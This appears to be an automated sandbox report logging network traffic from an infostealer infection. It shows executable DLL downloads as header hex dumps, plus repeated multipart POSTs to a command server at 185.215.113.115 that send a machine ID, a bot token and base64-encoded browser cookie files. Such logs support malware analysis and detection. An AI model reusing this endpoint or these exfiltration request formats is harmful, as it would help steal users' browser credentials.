              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Feb 2025 17:48:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Feb 2025 17:48:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Feb 2025 17:48:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Feb 2025 17:49:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 30 32 32 39 46 44 36 46 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 2d 2d 0d 0a Data Ascii: ------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="hwid"830229FD6F8E3984212470------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="build"reno------BFIJEHCBAKFCAKFHCGDG--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"browsers------AFHDAKJKFCFBGCBGDHCB--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGIIHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 2d 2d 0d 0a Data Ascii: ------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="message"plugins------FIIIIDGHJEBFBGDHDGII--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAFHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 2d 2d 0d 0a Data Ascii: ------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="message"fplugins------BFCFBFBFBKFIDHJKFCAF--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBHost: 185.215.113.115Content-Length: 5867Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEHHost: 185.215.113.115Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------CAKEBFCFIJJKKECAKJEH--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHCHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="file"------GDBKJDGIJECFIEBFIDHC--
